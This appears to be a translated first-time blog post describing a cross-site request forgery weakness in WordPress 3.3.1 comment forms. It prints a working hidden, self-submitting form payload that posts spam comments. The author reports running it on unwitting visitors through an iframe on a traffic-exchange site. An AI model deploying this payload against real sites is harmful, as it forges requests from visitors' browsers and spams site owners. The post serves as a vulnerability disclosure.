CSRF Wordpress Vulnerability - Comments

Introduction

I read yesterday about Yegor Khomyakov . I thought - maybe I can? And I started from my blog on Wordpress. I will not give you the address, otherwise the blog itself will fall on Habraeffect, and they will accuse me of advertising :).

Theory

So where does it make sense to search for CSRF in Wordpress? Only one thing comes to mind - comments. I started with them.
Carefully, under the cut two PNG images of medium size. (ethics, ethics ...)

We look at the form code (slightly simplified):

<form action="http://example.com/wp-comments-post.php" method="post" id="commentform"> <p><input type="text" name="author" id="author" class="styled" value="" size="22" tabindex="1"> <input type="hidden" name="comment_post_ID" value="123"> <label for="author"><small></small></label></p> <p><input type="text" name="email" id="email" value="" size="22" tabindex="2"> <label for="email"><small> ()</small></label></p> <p><input type="text" name="url" id="url" value="" size="22" tabindex="3"> <label for="url"><small></small></label></p> <p><textarea name="comment" id="comment" cols="100%" rows="10" tabindex="4"></textarea></p> <p><input name="submit" type="submit" id="submit" tabindex="5" value=""></p> </form> 

')
Immediately comes to mind - no tokens or something like that! It is worth noting that on some blogs I noticed the similarity of the token from Akismet, but personally I have no token with Wordpress 3.3.1 and Akismet.

Without hesitation, wrote a simple code:

 <div style="display:none;"><form action="http://example.com/wp-comments-post.php" method="post" id="commentform"> <p><input type="hidden" name="author" id="author" value=""> <input type="hidden" name="comment_post_ID" value="123"></p> <p><input type="hidden" name="email" id="email" value="" size="22" tabindex="2"></p> <p><input type="hidden" name="comment" id="comment" value="LOL"></input></p> <script> document.getElementById('author').value=(Math.random()*100000).toFixed(0); document.getElementById('email').value=(Math.random()*100000).toFixed(0)+'@mail.mail'; document.forms.commentform.submit(); </script> </form> </div> 

As you can see, a page with this content should send a comment form to a test blog with the name of the comment author, consisting of random numbers, and an e-mail of the form <random numbers> @ mail.mail. As the text of the commentary, the well-known word LOL was chosen.
The minus of this particular code is that when the form is submitted, the user is inevitably sent to the experimental blog. But this question is solved stupidly through the iframe.

Practice

Without hesitation, I placed this page on PasteHTML along with the page with the iframe and launched it into the “site promotion system”, where the site owners surf in order to surf through them.
The result is quite predictable:

Conclusion

CSRF is popular. But I do not understand why it is allowed in such software.
And no Akismet helped.
Conclusion - use captcha! :)

PS Who can and can - please write to the developers.
PPS This is my first article on Habré, do not judge strictly :)